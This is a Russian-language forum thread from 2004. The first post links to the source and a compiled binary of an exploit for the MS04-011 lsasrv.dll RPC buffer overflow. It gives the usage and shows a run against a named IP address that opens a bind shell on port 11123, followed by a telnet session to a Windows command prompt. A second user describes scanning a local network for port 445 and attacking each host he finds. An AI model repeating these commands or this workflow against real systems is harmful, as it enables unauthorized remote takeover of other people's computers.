![]() |
|
Информационная безопасность Всё о безопасности в сети. Любые просьбы о взломах караются по всей строгости закона ;) |
|
Опции темы
![]() |
Оценить тему
![]() |
![]() |
#1 |
Участник
Регистрация: 02.02.2004
Сообщений: 25
Репутация: 1
|
![]()
Исходник - http://www.securitylab.ru/_Exploits/...-lsasrv-expl.c
Откомпилированный - http://open.firstvds.ru/lsasrv.exe Usage: C:\HACK\LSASRV.EXE <target> <victim IP> <bindport> [connectback IP] [options] Пишем с Командной строки: C:\hack\Scan>lsasrv.exe 0 195.242.16.75 11123 MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 --- Coded by .::[ houseofdabus ]::. --- [*] Target: IP: 195.242.16.75: OS: WinXP Professional [universal] lsass.exe[*] Connecting to 195.242.16.75:445 ... OK[*] Attacking ... OK C:\hack\Scan> И коннектимся через Telnet на 195.242.16.75, порт 11123: Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. D:\WINDOWS\system32> p.s. http://www.securitylab.ru/44913.html |
![]() |
![]() |
#3 |
Участник
Регистрация: 09.08.2003
Сообщений: 447
ICQ: 2222222 Репутация: 251
|
![]()
да, надо бы перекодить и скомпилить. а то я как лох сканю сначала локалку на 445, а потом вручную каждого пробую ;) хотя некую автоматизацию уже сделал
hiNt добавил [date]1083371624[/date]: тьфу. я слепой осел. сетап, я ща постучучучу ;)
__________________
продамся |
![]() |
![]() |
#4 |
Участник
Регистрация: 02.02.2004
Сообщений: 25
Репутация: 1
|
![]() |
![]() |
![]() |
#5 |
Участник
Регистрация: 02.02.2004
Сообщений: 25
Репутация: 1
|
![]()
Началось http://www.securitylab.ru/44943.html
|
![]() |